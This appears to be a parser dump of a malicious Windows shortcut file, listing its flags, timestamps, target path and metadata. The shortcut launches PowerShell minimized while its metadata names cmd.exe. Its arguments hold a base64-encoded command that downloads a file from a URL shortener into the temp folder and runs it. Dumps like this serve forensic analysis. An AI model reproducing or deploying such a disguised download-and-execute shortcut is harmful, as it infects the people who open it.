Windows Shortcut Information:
   Link CLSID: 00021401-0000-0000-C000-000000000046
   Link Flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasWorkingDir | HasArguments | IsUnicode | EnableTargetMetadata - (524475)
   File Flags: FILE_ATTRIBUTE_ARCHIVE - (32)

   Creation Timestamp: 2024-02-16 21:44:00.915218+00:00
   Modified Timestamp: 2024-02-16 21:44:00.915218+00:00
   Accessed Timestamp: 2024-10-03 09:53:00.814244+00:00

   Icon Index: 0 
   Window Style: SW_SHOWMINNOACTIVE 
   HotKey: UNSET - UNSET {0x0000} 

   TARGETS:
      Index: 78
      ITEMS:
         Root Folder
            Sort index: My Computer
            Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
         Volume Item
            Flags: 0xf
            Data: None
         File entry
            Flags: Is directory
            Modification time: 2024-10-03 08:06:18+00:00
            File attribute flags: 16
            Primary name: Windows
         File entry
            Flags: Is directory
            Modification time: 2024-10-03 09:39:36+00:00
            File attribute flags: 16
            Primary name: System32
         File entry
            Flags: Is directory
            Modification time: 2022-05-07 05:24:52+00:00
            File attribute flags: 16
            Primary name: WindowsPowerShell
         File entry
            Flags: Is directory
            Modification time: 2024-06-24 18:45:32+00:00
            File attribute flags: 16
            Primary name: v1.0
         File entry
            Flags: Is file
            Modification time: 2024-02-16 21:44:02+00:00
            File attribute flags: 32
            Primary name: powershell.exe

   LINK INFO:
      Link info flags: 1
      Local base path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Common path suffix: 
      LOCAL:
         Drive type: 3
         Drive serial number: 0x7cea241e
         Drive type: DRIVE_FIXED
         Volume label: 

   DATA
      Relative path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Working directory: C:\Windows\system32
      Command line arguments: -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=

   EXTRA BLOCKS:
      SPECIAL_FOLDER_LOCATION_BLOCK
         Special folder id: 37
      KNOWN_FOLDER_LOCATION_BLOCK
         Known folder id: 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7
      DISTRIBUTED_LINK_TRACKER_BLOCK
         Length: 88
         Version: 0
         Machine identifier: windows11
         Droid volume identifier: 6F2A005C-0139-4183-8271-EFCFD922DD1A
         Droid file identifier: CA273BFC-812C-11EF-A074-085BD6C87787
         Birth droid volume identifier: 6F2A005C-0139-4183-8271-EFCFD922DD1A
         Birth droid file identifier: CA273BFC-812C-11EF-A074-085BD6C87787
      METADATA_PROPERTIES_BLOCK
         Property store:
            Storage:
               Version: 0x53505331
               Format id: DABD30ED-0043-4789-A7F8-D013A4736622
               Serialized property values:
                  Property:
                     Id: 100
                     Value: System32 (C:\Windows)
                     Value type: VT_LPWSTR
            Storage:
               Version: 0x53505331
               Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE
               Serialized property values:
                  Property:
                     Id: 4
                     Value: S-1-5-21-940291183-874774319-2012240919-1001
                     Value type: VT_LPWSTR
            Storage:
               Version: 0x53505331
               Format id: B725F130-47EF-101A-A5F1-02608C9EEBAC
               Serialized property values:
                  Property:
                     Id: 10
                     Value: cmd.exe
                     Value type: VT_LPWSTR
                  Property:
                     Id: 15
                     Value: None
                     Value type: VT_FILETIME
                  Property:
                     Id: 12
                     Value: None
                     Value type: VT_UI8
                  Property:
                     Id: 4
                     Value: Application
                     Value type: VT_LPWSTR
                  Property:
                     Id: 14
                     Value: None
                     Value type: VT_FILETIME
            Storage:
               Version: 0x53505331
               Format id: 28636AA6-953D-11D2-B5D6-00C04FD918D0
               Serialized property values:
                  Property:
                     Id: 30
                     Value: C:\Windows\System32\cmd.exe
                     Value type: VT_LPWSTR
            Storage:
               Version: 0x53505331
               Format id: 446D16B1-8DAD-4870-A748-402EA43D788C
               Serialized property values:
                  Property:
                     Id: 104
                     Value: None
                     Value type: VT_CLSID
